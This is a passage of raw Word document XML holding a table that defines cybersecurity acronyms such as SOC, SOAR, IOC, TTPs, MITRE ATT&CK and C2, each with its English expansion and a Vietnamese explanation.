                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Operations Center</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trung tâm điều hành và giám sát an ninh mạng</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37">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SOAR</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Orchestration, Automation, and Response</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nền tảng điều phối, tự động hóa và phản ứng an ninh</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IOC</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Indicators of Compromise</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dấu hiệu chỉ điểm xâm nhập (IP, Hash, Domain, URL)</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3D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TTPs</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tactics, Techniques, and Procedures</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chiến thuật, Kỹ thuật và Quy trình tấn công</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OSINT</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Open Source Intelligence</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tình báo an ninh từ nguồn mở</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43">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Adversarial Tactics, Techniques, and Common Knowledge</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Khung cơ sở tri thức chiến thuật và kỹ thuật của kẻ tấn công</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure Shell</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Giao thức điều khiển máy chủ dòng lệnh mã hóa an toàn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49">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ASN</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Autonomous System Number</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Số hiệu hệ thống tự trị của các nhà cung cấp mạng ISP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">API</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Application Programming Interface</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Giao diện lập trình ứng dụng</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4F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 / C&amp;C</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command and Control</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Máy chủ điều khiển mạng máy tính ma (Botnet)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MTTR</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mean Time to Respond</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
